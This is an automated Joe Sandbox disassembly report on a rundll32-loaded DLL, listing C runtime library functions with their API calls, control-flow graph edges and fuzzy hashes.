                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find_free$File$CloseFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 1576393127-0
                                                                                              • Opcode ID: 7a1798ba8454816db3bd08230d72ec73c442c9ba3e15ab9d416710dcd5a3faa1
                                                                                              • Instruction ID: fdbec521d8f157814cf4ff326458421ee26e1845714f279302c17d0000796dec
                                                                                              • Opcode Fuzzy Hash: 7a1798ba8454816db3bd08230d72ec73c442c9ba3e15ab9d416710dcd5a3faa1
                                                                                              • Instruction Fuzzy Hash: B861067590411E9FDF209FB8CC98AEEB7BAEB09304F5041F9E419A7208DB315E859F10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E2294D4 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E2295CC
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E2295D6
                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E2295E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: 4d58ec2c81b67e019cce8ea4c3ae8613045788abfda88e370c3fa2ae935d715e
                                                                                              • Instruction ID: cab8195dc433a3c121bd13738aa43817cb88d42c3a461f09ea3e31bf81bfe27b
                                                                                              • Opcode Fuzzy Hash: 4d58ec2c81b67e019cce8ea4c3ae8613045788abfda88e370c3fa2ae935d715e
                                                                                              • Instruction Fuzzy Hash: 8031D17491122DABCB21DF64D8887CCBBB9BF08710F5041EAE81CA7290EB749B85CF44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22CEA4 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: cc00d2262252314feb4e433b19d3fd1e11df39094a203689b8cee86f84202077
                                                                                              • Instruction ID: 169d4fca71f47308b691ce1ad49de41e48eb000f53bdeb1d93522257b3ec529c
                                                                                              • Opcode Fuzzy Hash: cc00d2262252314feb4e433b19d3fd1e11df39094a203689b8cee86f84202077
                                                                                              • Instruction Fuzzy Hash: DEA011B0208A008BCB208E30A20E2083BAABAA2B8030880AAA000CA000EB208000CE20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22DA8D Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 406 6e22da8d-6e22daa1 407 6e22daa3-6e22daa8 406->407 408 6e22db0f-6e22db17 406->408 407->408 409 6e22daaa-6e22daaf 407->409 410 6e22db19-6e22db1c 408->410 411 6e22db5e-6e22db76 call 6e22dbfe 408->411 409->408 413 6e22dab1-6e22dab4 409->413 410->411 412 6e22db1e-6e22db5b call 6e22b59f * 4 410->412 421 6e22db79-6e22db80 411->421 412->411 413->408 416 6e22dab6-6e22dabe 413->416 419 6e22dac0-6e22dac3 416->419 420 6e22dad8-6e22dae0 416->420 419->420 425 6e22dac5-6e22dad7 call 6e22b59f call 6e22decd 419->425 423 6e22dae2-6e22dae5 420->423 424 6e22dafa-6e22db0e call 6e22b59f * 2 420->424 426 6e22db82-6e22db86 421->426 427 6e22db9f-6e22dba3 421->427 423->424 429 6e22dae7-6e22daf9 call 6e22b59f call 6e22dfcb 423->429 424->408 425->420 434 6e22db88-6e22db8b 426->434 435 6e22db9c 426->435 430 6e22dba5-6e22dbaa 427->430 431 6e22dbbb-6e22dbc7 427->431 429->424 438 6e22dbb8 430->438 439 6e22dbac-6e22dbaf 430->439 431->421 441 6e22dbc9-6e22dbd4 call 6e22b59f 431->441 434->435 443 6e22db8d-6e22db9b call 6e22b59f * 2 434->443 435->427 438->431 439->438 448 6e22dbb1-6e22dbb7 call 6e22b59f 439->448 443->435 448->438
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 6E22DAD1
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DEEA
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DEFC
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DF0E
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DF20
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DF32
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DF44
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DF56
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DF68
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DF7A
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DF8C
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DF9E
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DFB0
                                                                                                • Part of subcall function 6E22DECD: _free.LIBCMT ref: 6E22DFC2
                                                                                              • _free.LIBCMT ref: 6E22DAC6
                                                                                                • Part of subcall function 6E22B59F: HeapFree.KERNEL32(00000000,00000000,?,6E22A79C), ref: 6E22B5B5
                                                                                                • Part of subcall function 6E22B59F: GetLastError.KERNEL32(?,?,6E22A79C), ref: 6E22B5C7
                                                                                              • _free.LIBCMT ref: 6E22DAE8
                                                                                              • _free.LIBCMT ref: 6E22DAFD
                                                                                              • _free.LIBCMT ref: 6E22DB08
                                                                                              • _free.LIBCMT ref: 6E22DB2A
                                                                                              • _free.LIBCMT ref: 6E22DB3D
                                                                                              • _free.LIBCMT ref: 6E22DB4B
                                                                                              • _free.LIBCMT ref: 6E22DB56
                                                                                              • _free.LIBCMT ref: 6E22DB8E
                                                                                              • _free.LIBCMT ref: 6E22DB95
                                                                                              • _free.LIBCMT ref: 6E22DBB2
                                                                                              • _free.LIBCMT ref: 6E22DBCA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: 2bf566902b26cb70ea6750b2c6abeb5bb5680a8f9d0035f72cbe71a4d0145d4d
                                                                                              • Instruction ID: 9f17d163466782ffecbb18daf2ae83a12abb62390964d458bc3496581cb5ead4
                                                                                              • Opcode Fuzzy Hash: 2bf566902b26cb70ea6750b2c6abeb5bb5680a8f9d0035f72cbe71a4d0145d4d
                                                                                              • Instruction Fuzzy Hash: 70314C3560470A9FEB619FB4D854B8A73EAAF08316F104839E45ADB194DF32F950CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E2278C0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 308COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 463 6e2278c0-6e2278e9 call 6e22886f 466 6e227c70-6e227c75 call 6e22aa8c 463->466 467 6e2278ef-6e2278f2 463->467 467->466 469 6e2278f8-6e227901 467->469 471 6e227a03 469->471 472 6e227907-6e22790b 469->472 473 6e227a05-6e227a0b 471->473 472->471 474 6e227911-6e227918 472->474 475 6e227a13-6e227a1f 473->475 476 6e227930-6e227935 474->476 477 6e22791a-6e227921 474->477 480 6e227bd6-6e227bd9 475->480 481 6e227a25-6e227a29 475->481 476->473 479 6e22793b-6e227943 call 6e22757b 476->479 477->476 478 6e227923-6e22792a 477->478 478->471 478->476 491 6e227c07-6e227c0b 479->491 492 6e227949-6e227962 call 6e22757b * 2 479->492 483 6e227bdb-6e227bdf 480->483 484 6e227bfd-6e227c05 call 6e22757b 480->484 481->480 485 6e227a2f-6e227a36 481->485 483->466 487 6e227be5-6e227bfa call 6e227c76 483->487 484->466 484->491 488 6e227a38-6e227a3f 485->488 489 6e227a4e-6e227a51 485->489 487->484 488->489 494 6e227a41-6e227a48 488->494 495 6e227a57-6e227a7e call 6e226b33 489->495 496 6e227b6c-6e227b70 489->496 492->466 518 6e227968-6e22796e 492->518 494->480 494->489 495->496 510 6e227a84-6e227a87 495->510 498 6e227b72-6e227b7b call 6e226eda 496->498 499 6e227b7c-6e227b80 496->499 498->499 499->484 504 6e227b82-6e227b8e 499->504 504->484 508 6e227b90-6e227b94 504->508 511 6e227ba6-6e227bae 508->511 512 6e227b96-6e227b9e 508->512 514 6e227a8a-6e227a9f 510->514 516 6e227bb0-6e227bc3 call 6e22757b * 2 511->516 517 6e227bc5-6e227bd2 call 6e2282d6 511->517 512->484 515 6e227ba0-6e227ba4 512->515 519 6e227aa5-6e227aa8 514->519 520 6e227b4e-6e227b61 514->520 515->484 515->511 550 6e227c0c call 6e22aa50 516->550 532 6e227c31-6e227c49 call 6e22757b * 2 517->532 533 6e227bd4 517->533 524 6e227970-6e227974 518->524 525 6e22799a-6e2279a2 call 6e22757b 518->525 519->520 522 6e227aae-6e227ab6 519->522 520->514 526 6e227b67-6e227b6a 520->526 522->520 528 6e227abc-6e227ad0 522->528 524->525 531 6e227976-6e22797d 524->531 541 6e2279a4-6e2279c4 call 6e22757b * 2 call 6e2282d6 525->541 542 6e227a0d-6e227a10 525->542 526->496 534 6e227ad3-6e227ae3 528->534 537 6e227991-6e227994 531->537 538 6e22797f-6e227986 531->538 563 6e227c4b 532->563 564 6e227c4e-6e227c6b call 6e226d17 call 6e2281d6 call 6e228393 call 6e228152 532->564 533->484 539 6e227ae5-6e227af8 call 6e227dac 534->539 540 6e227b0b-6e227b18 534->540 537->466 537->525 538->537 545 6e227988-6e22798f 538->545 556 6e227afa-6e227b00 539->556 557 6e227b1c-6e227b48 call 6e227840 539->557 540->534 549 6e227b1a 540->549 541->542 575 6e2279c6-6e2279cb 541->575 542->475 545->525 545->537 554 6e227b4b 549->554 560 6e227c11-6e227c2c call 6e226eda call 6e227f57 call 6e227103 550->560 554->520 556->539 561 6e227b02-6e227b08 556->561 557->554 560->532 561->540 563->564 564->466 575->550 578 6e2279d1-6e2279d3 575->578 580 6e2279d6-6e2279e9 call 6e227f6f 578->580 580->560 586 6e2279ef-6e2279fb 580->586 586->550 587 6e227a01 586->587 587->580
                                                                                              APIs
                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2279BB
                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 6E2279E2
                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 6E227AEE
                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E227BC9
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 6E227C50
                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 6E227C6B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                              • String ID: B#n$csm$csm$csm
                                                                                              • API String ID: 2123188842-3338018287
                                                                                              • Opcode ID: ab9001a95a3b6bd0fd71d21bef5d085da9af9cbcf420549ca2e2257497359f10
                                                                                              • Instruction ID: 1cbcf5556e5db9450e69c3f33cc9fb0ddbb747fe030d365c5088a4f5a6b04ce1
                                                                                              • Opcode Fuzzy Hash: ab9001a95a3b6bd0fd71d21bef5d085da9af9cbcf420549ca2e2257497359f10
                                                                                              • Instruction Fuzzy Hash: BEC1677581820E9FCF15CFE4C890ADEBBBABF08315F10496AE8116B295D731DA61CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22AE18 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: d0387e37357f31ba8e8954bab79849bb1bc8e66ca0d48cc7b61afa8619292c50
                                                                                              • Instruction ID: 0d15668e9b24f06a7fb6da91ce4013bd9802732c3029246dbe8ce5baaa63a3db
                                                                                              • Opcode Fuzzy Hash: d0387e37357f31ba8e8954bab79849bb1bc8e66ca0d48cc7b61afa8619292c50
                                                                                              • Instruction Fuzzy Hash: 1721647A90060CAFCB51EFE4C881DDE7BBAAF0C344F1149A6A5159F165EB31EA548B80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E227210 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 615 6e227210-6e227261 call 6e2325b7 call 6e2271d0 call 6e2283ec 622 6e227263-6e227275 615->622 623 6e2272bd-6e2272c0 615->623 625 6e2272e0-6e2272e9 622->625 626 6e227277-6e22728e 622->626 624 6e2272c2-6e2272cf call 6e228610 623->624 623->625 631 6e2272d4-6e2272dd call 6e2271d0 624->631 628 6e227290-6e22729e call 6e2285c0 626->628 629 6e2272a4 626->629 638 6e2272a0 628->638 639 6e2272b4-6e2272bb 628->639 630 6e2272a7-6e2272ac 629->630 630->626 633 6e2272ae-6e2272b0 630->633 631->625 633->625 636 6e2272b2 633->636 636->631 640 6e2272a2 638->640 641 6e2272ea-6e2272f3 638->641 639->631 640->630 642 6e2272f5-6e2272fc 641->642 643 6e22732d-6e22733d call 6e2285f4 641->643 642->643 645 6e2272fe-6e22730d call 6e231d20 642->645 649 6e227351-6e22736f call 6e2271d0 call 6e2285d8 643->649 650 6e22733f-6e22734e call 6e228610 643->650 651 6e22732a 645->651 652 6e22730f-6e227327 645->652 650->649 651->643 652->651
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6E227247
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6E22724F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6E2272D8
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6E227303
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6E227358
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: d153b33a49c85125fbaab4d3748b631490bb7f9ff64eb2f614ec3ea0f0bf3f4f
                                                                                              • Instruction ID: faf789087bae0dad4fa29708a80a209704467b2510d269958f862775919040c4
                                                                                              • Opcode Fuzzy Hash: d153b33a49c85125fbaab4d3748b631490bb7f9ff64eb2f614ec3ea0f0bf3f4f
                                                                                              • Instruction Fuzzy Hash: 7C419034A0421E9FCF14CFE9C880A9E7BB6AF45318F1085A5EC146B391D771E915CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22CAC2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: api-ms-$ext-ms-
                                                                                              • API String ID: 0-537541572
                                                                                              • Opcode ID: 1d1ec6de047800daf9a443898ad8b4c05525c7faaae1b40f69240150ead25cd2
                                                                                              • Instruction ID: 2c23f67621a03d1903c4aa4844c3130f2beb2a4e08f181f195880a715b1eeb9e
                                                                                              • Opcode Fuzzy Hash: 1d1ec6de047800daf9a443898ad8b4c05525c7faaae1b40f69240150ead25cd2
                                                                                              • Instruction Fuzzy Hash: 1D21E171A5562AAFDB214AE98C45E4A776B9B02FA2F310570ED17AF280D632DD00C5F0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22E06C Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6E22E034: _free.LIBCMT ref: 6E22E059
                                                                                              • _free.LIBCMT ref: 6E22E0BA
                                                                                                • Part of subcall function 6E22B59F: HeapFree.KERNEL32(00000000,00000000,?,6E22A79C), ref: 6E22B5B5
                                                                                                • Part of subcall function 6E22B59F: GetLastError.KERNEL32(?,?,6E22A79C), ref: 6E22B5C7
                                                                                              • _free.LIBCMT ref: 6E22E0C5
                                                                                              • _free.LIBCMT ref: 6E22E0D0
                                                                                              • _free.LIBCMT ref: 6E22E124
                                                                                              • _free.LIBCMT ref: 6E22E12F
                                                                                              • _free.LIBCMT ref: 6E22E13A
                                                                                              • _free.LIBCMT ref: 6E22E145
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 6688a93d272e8f63d8b572137aeade3ba908fe40e4732d61955ac79dadc09bbf
                                                                                              • Instruction ID: 8cdaa1772984d242a79f2cba6f9f660b175bcc10ce1565d2b2c96aeef0f33217
                                                                                              • Opcode Fuzzy Hash: 6688a93d272e8f63d8b572137aeade3ba908fe40e4732d61955ac79dadc09bbf
                                                                                              • Instruction Fuzzy Hash: A4116A35545B0CAFD632ABF0CC05FCB779EAF08748F400C34A3A9AF050DBA4B6199692
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22EE9C Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6E22EEE4
                                                                                              • __fassign.LIBCMT ref: 6E22F0C3
                                                                                              • __fassign.LIBCMT ref: 6E22F0E0
                                                                                              • WriteFile.KERNEL32(?,6E22D5C4,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E22F128
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E22F168
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E22F214
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 4031098158-0
                                                                                              • Opcode ID: e459753afe62309b2fd170ec150cdc532b9451f2370a67fcf126b8559254b168
                                                                                              • Instruction ID: 88e2bdd3c2aa0d8883f4c0d46532f3eeb39df418f1c62406b141262e9b2fc429
                                                                                              • Opcode Fuzzy Hash: e459753afe62309b2fd170ec150cdc532b9451f2370a67fcf126b8559254b168
                                                                                              • Instruction Fuzzy Hash: 27D16A75D0025D9FDB15CFE8C8809EEBBB6FF49314F28016AE855BB241D631AA46CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E227589 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000001,?,6E227193,6E225EA7,6E22633C,?,6E226574,?,00000001,?,?,00000001,?,6E239B08,0000000C,6E226668), ref: 6E227597
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2275A5
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2275BE
                                                                                              • SetLastError.KERNEL32(00000000,6E226574,?,00000001,?,?,00000001,?,6E239B08,0000000C,6E226668,?,00000001,?), ref: 6E227610
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: ec82387c6bd034c41c64fab145d857af1e5c57bf32a3690fe858be765fbc0139
                                                                                              • Instruction ID: 90e9e64dd3c1ea74bad158911b7c4215cb636d588243e7d3c47d2e518cbf92a3
                                                                                              • Opcode Fuzzy Hash: ec82387c6bd034c41c64fab145d857af1e5c57bf32a3690fe858be765fbc0139
                                                                                              • Instruction Fuzzy Hash: 7B01F53A21CA1F5FEB390AFA5D88B962B5BEB036797200639F530850D4FF914C1299A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22BE0B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E22BE10
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
